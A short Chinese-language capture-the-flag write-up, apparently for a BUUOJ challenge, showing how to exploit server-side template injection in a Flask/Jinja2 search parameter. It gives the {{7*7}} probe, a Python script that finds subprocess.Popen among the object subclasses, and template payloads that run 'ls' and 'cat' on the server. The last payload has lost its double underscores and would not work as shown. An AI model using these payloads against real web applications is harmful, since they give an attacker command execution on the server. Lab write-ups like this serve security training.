源代码有两处提示:
<!-- Parameter Name: search --> <!-- Method: GET -->
输入?search={{7*7}}
出现以下内容说明存在模板注入漏洞:
You searched for:
49
爆出所有的类:
{{''.__class__.__mro__[2].__subclasses__()}}
查询subprocess.Popen在哪:
import requests import re import html url = "http://f2c96b25-5710-4057-b5e2-12e39acf4921.node3.buuoj.cn/?search={{%27%27.__class__.__mro__[2].__subclasses__()}}" s = requests.get(url).text result = re.findall("\<h2\>You searched for:\<\/h2\>\\n \<h3\>\[(.*?)\<\/h3\>",s,re.S) #反转义字符串 result = html.unescape(result[0])[:-1] result = result.split(', ') print(result.index("<class 'subprocess.Popen'>"))
运行得到结果为:258。
{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
得到flag:
{{''.class.mro[2].subclasses()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}